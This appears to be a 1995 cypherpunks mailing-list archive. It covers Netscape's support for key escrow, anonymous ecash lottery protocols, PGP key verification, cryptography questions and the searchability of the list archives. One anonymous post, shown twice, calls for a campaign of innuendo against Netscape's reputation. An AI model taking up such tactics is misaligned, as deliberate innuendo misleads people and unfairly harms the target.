X/* Otherwise fill it in */
X    else {
X	(void)strcat (line, word);
X	(void)strcat (line, " ");
X	room -= (l + 1);
X    }
X    return;
X}
END_OF_FILE
  if test 11822 -ne `wc -c <'markov3.l'`; then
    echo shar: \"'markov3.l'\" unpacked with wrong size!
  fi
  # end of 'markov3.l'
fi
echo shar: End of archive.
exit 0





From EALLENSMITH at ocelot.Rutgers.EDU  Wed Nov 29 21:43:08 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 13:43:08 +0800
Subject: The future will be easy to use
Message-ID: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>


From:	IN%"jlasser at rwd.goucher.edu"  "Jon Lasser" 29-NOV-1995 16:23:00.41

Not if you're encrypting a Credit Card transaction to ship physical 
goods.  In that case, I'm going to certainly want to link a key ID to a 
physical body (or at least address) if I'm the seller, so as to limit 
liability as best I can.

While this might not ultimately be important, early adopters of crypto on 
the net seem in general to be financially interested with an eye to limiting 
liability. They want linked keys.

There's a public-relations aspect to crypto which most systems not 
linking name -> key id fail.  This is the step necessary to get it out 
the door.

Unfortunately, it also appears counter to CP philosophy.

However, if you have optional linking of ID and name, shippers will only 
ship to keys with such attributes. Because just ID and address, it could 
be a "hit and run" type attack shipped to a safe maildrop.
---------------------------------
	If the transaction is via a Credit Card, it's the card issuer's
liability (and responsibility to determine creditworthiness), unless I'm badly
mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge
physical dollars when ecash is presented to them. What's the risk in either
case?
	-Allen





From EALLENSMITH at ocelot.Rutgers.EDU  Wed Nov 29 21:44:58 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 13:44:58 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <01HY8GTQ0EGY8WYXCN@mbcl.rutgers.edu>


From:	IN%"tcmay at got.net" 29-NOV-1995 23:16:11.12

Personally, I have long had great _hopes_ for using crypto for
non-sanctioned gambling, but I'm pretty skeptical that many people will do
it. For one thing, anyone knowledgeable enough to be comfortable with the
crytography knows that gambling when a house cut exists is a lose. (And
gambling with no house cut is, at best, a wash.)
-----------------------
	How about gambling on something other than random numbers? Idea Futures
are one instance, as is sports gambling for those interested in that sort of
thing.
	-Allen





From s1113645 at tesla.cc.uottawa.ca  Wed Nov 29 22:01:04 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 30 Nov 1995 14:01:04 +0800
Subject: Esoteric Lotteries Re: Quit it!
In-Reply-To: <199511300520.GAA07040@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9511300050.A20502-0100000@tesla.cc.uottawa.ca>


One might be tempted to use the number of posts claiming to be from Alice 
d'Anonymous on any particular day as a fair random number basis for some
gambling scheme.

 Good going Alices
					Not another one of those...





From anonymous-remailer at shell.portal.com  Wed Nov 29 22:13:21 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 30 Nov 1995 14:13:21 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511300602.WAA13054@jobe.shell.portal.com>


Alice here ...

Sorry to follow up on my own post, but I made a boo boo.  A real, big
boo boo.

On Wed, 29 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> On Wed, 29 Nov 1995, Adam Shostack wrote:
> >
> > 	I don't follow.  You're claiming that PGP is good enough to
> > transfer OTPads, but not good enough to sign pseudononymous messages?
> 
> Sure. Two different situations.
> 
> If I take a message or a data tape and encrypt it with a one time pad.  
> 
> And then I send the message out to someone via Greyhound or DHL.
> 
> And once they've confirmed that they have the encrypted message safely in 
> hand, then I'll call them and ask them to call me with their public key
> delivered by voice via telephone.

Actually, I made a big mistake here.  It's not good enough for me to
call them.  Usually I have them first call me, and then I call them
back.

I learned to do this in real-estate when I had my property management
company.

Very often, someone would call the office, and say something along the
lines of "This is Constable Acheson, from the Calgary City Police.
Could you please tell me the forwarding address of your former tenant,
Alice" (or Bob, or whatever).

My standard response always was to ask for whoever identified himself
as "Constable Acheson" to provide his division.  Then I'd hang up,
check the number for the main switchboard in the phone book and then
call him.  This way, I'd be sure it was actually him, and that he was
calling from where he claimed.

You'd probably be surprised (or maybe not) how many times, there was
no such Constable.  Luckily, I just didn't give out my information to
just *anyone*.

And the same stuff applies here ... with reading and verifying the key
over the telephone.  With the phone call there should be a hangup and then
some third-party authority to confirm that the channel of communication is
*really* a valid channel. 

Sorry, about leaving that part out.  

It was a boo boo, eh?  But it's important, RL stuff.

> Which I then use to encrypt the one-time-pad, using the PGP key only once.
> 
> Then, I'm comfortable sending it (not the message, but the pad) over the 
> Internet encrypted with PGP.  And I think at that point, I have Pretty 
> Good Privacy.
> 
> > Adam
> > 
> > -- 
> > "It is seldom that liberty of any kind is lost all at once."
> 
> 
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
> 
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 

Yep, it was the real me this time ... and no, I didn't add another
"signature" encrypted or not encrypted to the bottom of this post. 

Let me ask this though??  Would the "quality" of my post changed one way
or another, if this was signed, or not?? 

IMHO, the message should make sense (or not) either way.

                           ... Alice ...





From nobody at REPLAY.COM  Wed Nov 29 22:32:34 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 14:32:34 +0800
Subject: Applied Cryptography Questions
Message-ID: <199511300614.HAA08769@utopia.hacktic.nl>


A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

   ADVANTAGES
     Distributed computing, no easy bombing target.

   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of alogrithms
       for any specific alogrithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? Its probably cheaper that way.

3. How does one cryptoanalyize a Feistel Network? I've read a bit
   on this and it doesn't seem that the papers are consistant,
   for example, one claims that 2^32 chosen plaintext is unreasonable
   for a 64-bit block cipher whereas DES's cryptanalysis requires
   something like 2^42.

4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of miniutes] on a PC but is difficult to crack for a 
   big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?






From frantz at netcom.com  Wed Nov 29 22:39:26 1995
From: frantz at netcom.com (Bill Frantz)
Date: Thu, 30 Nov 1995 14:39:26 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <199511300621.WAA26406@netcom14.netcom.com>


At 20:38 11/29/95 -0800, Timothy C. May wrote:
>Have to be _very_ careful here. A variety of scams can be developed which
>show lots of "small" winners, but which fail to show any large winners. The
>lottery operators can make a lot of extra bucks by simply not paying off
>the large winnings, in various ways.

With complete anonimity, the scam I would think of first is giving other
nyms of myself all the big payoffs.

Bill







From sameer at c2.org  Wed Nov 29 22:59:05 1995
From: sameer at c2.org (sameer)
Date: Thu, 30 Nov 1995 14:59:05 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511300644.WAA02011@infinity.c2.org>


http://www.cnet.com/Central/News/govt.html

	Bad. Very Bad. And I was almost starting to like Netscape.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From loki at obscura.com  Wed Nov 29 23:05:13 1995
From: loki at obscura.com (Lance Cottrell)
Date: Thu, 30 Nov 1995 15:05:13 +0800
Subject: META: Lycos & Searchable archives
Message-ID: <ace3044e0e021004a6b0@[137.110.24.250]>


If you mail to an open list or post to news you are shouting through a
megaphone on a street corner. If you don't want everyone to know what you
said, use a remailer (this group above all others should do that).

        -Lance

At 9:56 PM 11/29/95, Leslie Todd Masco wrote:
>
>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos.  Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the we-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this?  My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.
>- --
>Todd Masco     | "life without caution/ the only worth living / love for a man/

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------







From hallam at w3.org  Thu Nov 30 00:03:36 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 30 Nov 1995 16:03:36 +0800
Subject: "Proprietary" internetworking protocols (was RE: The future will be  easy to use )
In-Reply-To: <01BABE83.A3A80240@ploshin.tiac.net>
Message-ID: <9511300318.AA02710@zorch.w3.org>



Both Netscape and Sun had a product that had a large number of seats. From what I 
have seen the POTP have diddly squat in the way of seats.

Looking at the market today it is clear that there are fewer oppotunities to do that 
type of roll out. Netscape and Sun were running just ahead of a market. Today I 
don't see how many people will want to abandon PGP for a product that is 
indistinguishable from smoke 'n mirrors.

	Phill
 





From scs at lokkur.dexter.mi.us  Thu Nov 30 00:03:52 1995
From: scs at lokkur.dexter.mi.us (Steve Simmons)
Date: Thu, 30 Nov 1995 16:03:52 +0800
Subject: key for Alice as promised (not)
In-Reply-To: <199511290507.VAA10591@jobe.shell.portal.com>
Message-ID: <49j6ot$5t1@lokkur.dexter.mi.us>


anonymous-remailer at shell.portal.com writes:

>PGP is really not the issue.  The issue is more my security and the
>environment that I use PGP in.  I don't have a trusted machine to run PGP
>on.  Anyone who wants to can come up to machine and copy my secret keyring
>or they can even watch me typing my password in. 

Oh, puh-lease.  Do you often send anonymous mail to cypherpunks with your
co-workers and friends looking over your shoulder?  So much for your
anonymity and security.  I dunno about this theory of reputation stuff,
but you've sure developed one.
-- 
Yea, the heavens shall open and the NP-complete solution given forth.
ATT executives shall give birth to two-headed operating systems, and 
copyrights shall be expunged.  The voice of the GNU shall be heard,
but the faithless will be without transcievers.





From futplex at pseudonym.com  Thu Nov 30 00:20:41 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 16:20:41 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <199511300807.DAA12251@opine.cs.umass.edu>


sameer writes:
> http://www.cnet.com/Central/News/govt.html

I think this is sufficiently important for a partial quotation:

---------------------------------------------
By Anne Knowles 	November 29, 1995, 12 p.m. PT

   BOSTON--Getting the government involved in maintaining Internet data
 privacy may not be popular, but it's going to be necessary. That's the message
 Netscape Communications chair Jim Clark delivered this morning in his keynote
 address to an audience here at Email World and Internet Expo. 

   To secure Net communications, the government will need to have access to
 private data exchanges using what is known as a key escrow security system,
 said Clark. He added that an invincible security system for the Net is 
 possible, but such a system won't be built unless the government has a stake 
 in it. "That's where key escrow comes in," said Clark. 
---------------------------------------------

> 	Bad. Very Bad. 

Agreed. As of a moment ago I could find absolutely no mention of this on
Netscape's web pages. I hope they will at least have the courage to put out a
"We Support Clipper II" press release. Now the question is, how much of a
role does Netscape Communications intend to play in implementing GAK, and
what can we do to counter it ?

-Futplex <futplex at pseudonym.com>





From sameer at c2.org  Thu Nov 30 00:44:29 1995
From: sameer at c2.org (sameer)
Date: Thu, 30 Nov 1995 16:44:29 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <ace2609d04021004758e@[205.199.118.202]>
Message-ID: <199511300324.TAA11412@infinity.c2.org>


> Personally, I have long had great _hopes_ for using crypto for
> non-sanctioned gambling, but I'm pretty skeptical that many people will do
> it. For one thing, anyone knowledgeable enough to be comfortable with the
> crytography knows that gambling when a house cut exists is a lose. (And
> gambling with no house cut is, at best, a wash.)
> 

	"anyone knowledgeable enough to be comfortable with the
crytography knows that gambling when a house cut exists is a lose."

	These people would not be the target market.

	My figuring is that the target market for lotteries would be
your average joe home web browser, and your gambling addicts, of
course. These people would not be caomfortable with encrypted open
books, but I don't think that encrypted open books is really necessary
to run a lottery which provably doesn't cheat. (Perhaps not
*provably*, but reliably enough that people will play... )
	High stakes lotteries may not be suitable but a slot-machine
low-stakes system with perhaps a $1/play and a 40% chance of winning
*something* (maybe not the full $1.00) could satisfy people enough
that they will keep playing, and tell their friends about it. The
target market here is by no means people who understand that house cut
gambling is a lose.
	The reason to have an ecash casino/lottery is two-fold: A)
Make ecash take off. B) Make lots of money.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From tcmay at got.net  Thu Nov 30 00:47:58 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 16:47:58 +0800
Subject: META: Lycos & Searchable archives
Message-ID: <ace2aaae09021004dca7@[205.199.118.202]>


At 5:56 AM 11/30/95, Leslie Todd Masco wrote:

>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos.  Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the we-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this?  My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.

I'm not sure how we'll find a consensus, and I don't relish the thought of
seeing hundreds of responses to your point, but....here's my vote.

I say any self-respecting Cypherpunk should realize immediately that
_every_ word one has ever posted to Usenet, mailing lists, and other public
or semi-public fora will soon be instantly retrievable. (The rates of
growth of the Net and of storage densities make it clear that archiving
_all_ past public messages is not much harder than archiving only the most
recent ones...thus, I predict, in 2005 one will be able to buy a disk or
disks of _all_ Usenet traffic prior to, say, 2003.)

More immediately, the person or persons who object to Lycos/Deja
News/Excite searches of their words face an uphill battle. Satisfying them
would mean making the various archive sites (currently only yours, Todd,
but other sites also store the traffic) unavailable.

So, I say: "Get with the program." Don't say anything under your True Name
that you don't want job interviewers to pull up in their pro forma searches
of your Usenet involvement.

(Thank God the U.S. has none of those damned "data privacy laws" which
might interfere with how people access the Net.)

--Tim May, who has said many, many controversial or even embarassing things
over the years, but who thinks anyone offended by his comments is not
someone he would want to deal with anyway.

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Thu Nov 30 01:03:02 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:03:02 +0800
Subject: Netscape gives in to key escrow
Message-ID: <ace2ae070a021004a5e9@[205.199.118.202]>


At 6:44 AM 11/30/95, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
>        Bad. Very Bad. And I was almost starting to like Netscape.

Thank you Sameer for pointing this out.

Jim Clark is actively working for the enemies of liberty and freedom.
Consider this quote:

"To secure Net communications, the government will need to have access to
private data exchanges using what is known as a key escrow security system,
said Clark. He added that an invincible security system for the Net is
possible, but such a system won't be built unless the government has a
stake in it. "That's where key escrow comes in," said Clark."

Note that this is beyond the "watered down" forms of "commercial key
escrow" that many advocates of forms of key escrow often like to talk about
(such as the nominally voluntary schemes espoused by TIS). This speech by
Clark is actually closer to the real truth of key escrow that we normally
here from public speakers: the government will need to have access,
therefore the key escrow will be mandatory, not voluntary.

Can Netscape continue to prosper? This latest issue won't kill it,
naturally, but I doubt a $5 billion market capitalization can persist when
a company has no technology that cannot be duplicated or bettered by
others. As an example, I use Netscape to do certain things, Eudora to do
other things, and Newswatcher to do still other things...I will switch to
an improved Web browser _much_ faster than I will switch to a new word
processor. I don't see much "staying power" inherent in Netscape's browser,
so I can't see how the company can maintain a market capitalization greater
than that of General Dynamics, CBS, and Apple.

I wonder what discussions Jim Clark has been having with the Feds?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From nobody at REPLAY.COM  Thu Nov 30 01:11:04 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 17:11:04 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511300849.JAA13845@utopia.hacktic.nl>


-----BEGIN PGP SIGNED MESSAGE-----

At 11/30/95 3:07 AM, Futplex quoted:

>> http://www.cnet.com/Central/News/govt.html
 ...
>---------------------------------------------
 ...
> said Clark. He added that an invincible security system for the Net is 
> possible, but such a system won't be built unless the government has a stake 
> in it. "That's where key escrow comes in," said Clark. 
>---------------------------------------------

      "A stake in its heart," more like.

Futplex then wrote:

 ...
>Netscape's web pages. I hope they will at least have the courage to put out a
>"We Support Clipper II" press release. Now the question is, how much of a
>role does Netscape Communications intend to play in implementing GAK, and
>what can we do to counter it ?

      Well, spamming the sign won't do.

      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
it.


Hieronymous
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
=0FmD
-----END PGP SIGNATURE-----





From nobody at REPLAY.COM  Thu Nov 30 01:20:40 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 17:20:40 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511300850.JAA13876@utopia.hacktic.nl>


-----BEGIN PGP SIGNED MESSAGE-----

At 11/30/95 3:07 AM, Futplex quoted:

>> http://www.cnet.com/Central/News/govt.html
 ...
>---------------------------------------------
 ...
> said Clark. He added that an invincible security system for the Net is 
> possible, but such a system won't be built unless the government has a stake 
> in it. "That's where key escrow comes in," said Clark. 
>---------------------------------------------

      "A stake in its heart," more like.

Futplex then wrote:

 ...
>Netscape's web pages. I hope they will at least have the courage to put out a
>"We Support Clipper II" press release. Now the question is, how much of a
>role does Netscape Communications intend to play in implementing GAK, and
>what can we do to counter it ?

      Well, spamming the sign won't do.

      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
it.


Hieronymous
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
=0FmD
-----END PGP SIGNATURE-----





From tcmay at got.net  Thu Nov 30 01:23:49 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:23:49 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <ace2b2de0c021004c90a@[205.199.118.202]>


At 6:22 AM 11/30/95, Bill Frantz wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonimity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.

Yes, this is a good example of one of the scams.

If the lottery can't/won't reveal True Names of winners--a basic design
criterion--then clearly people may have doubts.

The whole thing can be cast as follows;

"Send us money and we'll put your name in a hat. We'll let you know if you
win, but we won't tell the public who won." (This problem is quite similar
to voting protocols, so we might look to "fair voting" protocols for
ideas.)

My intuition (hand-waving) is that an anonymous lottery is possible, but I
haven't looked at the details. Certainly multiple trusted holders of keys
(escrow agents) would help make the lottery fair. Maybe bit commitment
would help (each player buys the right to play, then "commits" his number.
A public reading of the winning number occurs, and the winner can reveal
his winning number (anonymously if he wishes, providing he had registered
his hash....).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From rjc at clark.net  Thu Nov 30 01:29:36 1995
From: rjc at clark.net (Ray Cromwell)
Date: Thu, 30 Nov 1995 17:29:36 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <ace2ae070a021004a5e9@[205.199.118.202]>
Message-ID: <199511300918.EAA13821@clark.net>



  What's the point? Surely Clark must realize that even if Netscape
adds key escrow to SSL/Secure Courier, it is still possible to tunnel
real encryption through that link thus thwarting the escrow system.
In fact, this is the perfect job for Java:

1) Client connects to server thru insecure key-escrow channel and downloads
Java applet
2) Java applet opens new connection to server using "invincible" security
as Clark puts it, and performs add transactions on this channel. In fact,
in the future, a large number of "forms" will be Java applets which
submit information back to the server themselves.

  And what about IPSEC ESP? Even if the application layer is weak,
the link layer can more than make up for it.

  Now, Netscape has momentum, and if they set a key-escrow standard, there
is a chance of it being adopted widely. However, Java applets and IPSEC
can still make transactions through an insecure netscape payment/encryption
channel.

  The genie is out of the bottle.

-Ray







From nobody at REPLAY.COM  Thu Nov 30 02:17:39 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 18:17:39 +0800
Subject: Applied Cryptography Questions
Message-ID: <199511301008.LAA15993@utopia.hacktic.nl>


A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

   ADVANTAGES
     Distributed computing, no easy bombing target.

   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of alogrithms
       for any specific alogrithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? Its probably cheaper that way.

3. How does one cryptoanalyize a Feistel Network? Is there a general
   method?

4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of miniutes] on a PC but is difficult to crack for a 
   big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?







From s1113645 at tesla.cc.uottawa.ca  Thu Nov 30 03:31:21 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 30 Nov 1995 19:31:21 +0800
Subject: META: Lycos & Searchable archives
In-Reply-To: <199511300556.AAA15009@bb.hks.net>
Message-ID: <Pine.3.89.9511300640.B15267-0100000@tesla.cc.uottawa.ca>




On Thu, 30 Nov 1995, Leslie Todd Masco wrote:

> Someone has expressed concern to me that the cypherpunks archives are
> searchable via Lycos.  Said person doesn't mind having the archives
> searchable to the smaller audience of people who go to the we-site,
> but is unhappy about net-wide searches turning up cypherpunks articles.

Lycos only has a database of abstracts of the archive (which is still 
commendable) and the other databases have smallish local archives of the list. 
There's no way to do a compleat search at present (other than manual labor and 
writing 'bots). A true search engine at the site would be a godsend. 
I presume that people who post want their posts read.





From jirib at sweeney.cs.monash.edu.au  Thu Nov 30 03:37:34 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Thu, 30 Nov 1995 19:37:34 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <ace2b2de0c021004c90a@[205.199.118.202]>
Message-ID: <199511301122.WAA23954@sweeney.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks at toad.com
  and tcmay at got.net (Timothy C. May)

tcmay wrote:
> At 6:22 AM 11/30/95, Bill Frantz wrote:
> >At 20:38 11/29/95 -0800, Timothy C. May wrote:
> >>Have to be _very_ careful here. A variety of scams can be developed which
> >>show lots of "small" winners, but which fail to show any large winners. The
...
> My intuition (hand-waving) is that an anonymous lottery is possible, but I
> haven't looked at the details. Certainly multiple trusted holders of keys
...

I've read somewhere that it's possible to play poker over the telephone;
see comp.risks 17.19 and 17.21 (particularly the latter, though I haven't
followed the references so I can't speak of them).

...
> (escrow agents) would help make the lottery fair. Maybe bit commitment
> would help (each player buys the right to play, then "commits" his number.
...

How about every person commits a random number, then all reveal.
The winner is determined deterministically from all the numbers.

Does this make sense or is there some basic hole in it?

(
I have a tendency to be too brief to be comprehensible, so let me
rephrase it somewhat longer:

1. game is announced, players registered and numbered [1]..[n]
2. each player [i] chooses a random number [a_i] (secretly)
3. each player [i] publicly commits to [a_i]
4. wait for all players to commit
5. each player [i] publishes [a_i]
6. the winner is player [f(a_1,a_2,...,a_n)]

The function f doesn't need to be one way, but the output must depend on
all the inputs. (Sum modulo n sounds OK but I haven't thought it out.)
)

The fun bit in this game would be picking your number - of course
that reduces security, but I suspect that many people would prefer
to type in their lucky numbers themselves than having a computer
pick it for them... Or you could get the entropy from the mouse:
"it's all in the wrist".

You could probably almost code that in a shell script...


Obvious weakness is that the last player to do step 5 above knows
who the winner is before anyone else, and could presumably disappear.
The way to avoid this is a rule that when a player disappears the
money goes to charity. (A malicious last player could still prevent
you from winning, but at least without payoff. You could give it
negative payoff if you wanted.) If you wish to discuss this point,
Cc me at jiri at c031.aone.net.au - that's where my spreadsheet is.


Have I just made a complete fool of myself?

Jiri
- --
If you want an answer, please mail to <jirib at cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2T0yxV6mvvBgf5AQEtGQP/VKUGrArDxG98iIiAtQ0zuErSjCsMJN+P
HJ8MROmbgPa5kstzLMRk6wjPSkxSuUtiLLVbTTV6Aghfi2Kh7mRa6D38j43hyImU
Z0V6V7gtCis/QzZ7KSTt5KKkDev672bbL17XYVWhMfvLABUG7L7kCbbKDGjUgUrL
yl4H+8Pxt1c=
=2nuk
-----END PGP SIGNATURE-----





From frissell at panix.com  Thu Nov 30 03:53:07 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 30 Nov 1995 19:53:07 +0800
Subject: Netscape gives in to key escrow
Message-ID: <2.2b8.32.19951130114416.00950858@panix.com>


At 10:44 PM 11/29/95 -0800, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
>	Bad. Very Bad. And I was almost starting to like Netscape.
>

But I did like the story's description of Damien Doligez as a "group of
French scientists."

DCF

"Who used to have a personal life but who now does nothing but download Beta
upgrades from the Net."






From a.brown at nexor.co.uk  Thu Nov 30 03:55:02 1995
From: a.brown at nexor.co.uk (Andy Brown)
Date: Thu, 30 Nov 1995 19:55:02 +0800
Subject: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <30BC95AB.211E@nexor.co.uk>


Joel McNamara wrote:

> Peter Gutmann has an interesting article in sci.crypt, demonstrating how
> weak Microsoft's encryption is with basic access control in Windows for
> Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
> shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
> files.  I think a t-shirt is definitely in order for this.

Further information on the method used by Windows NT (a challenge-response
mechanism) can be found on the MSDN CD, or on the MS ftp site:
PSS ID Number: Q102716.  I'll mail the article to anyone that wants to see
it (~11k).


- Andy





From jirib at sweeney.cs.monash.edu.au  Thu Nov 30 04:05:57 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Thu, 30 Nov 1995 20:05:57 +0800
Subject: key for Alice as promised (not)
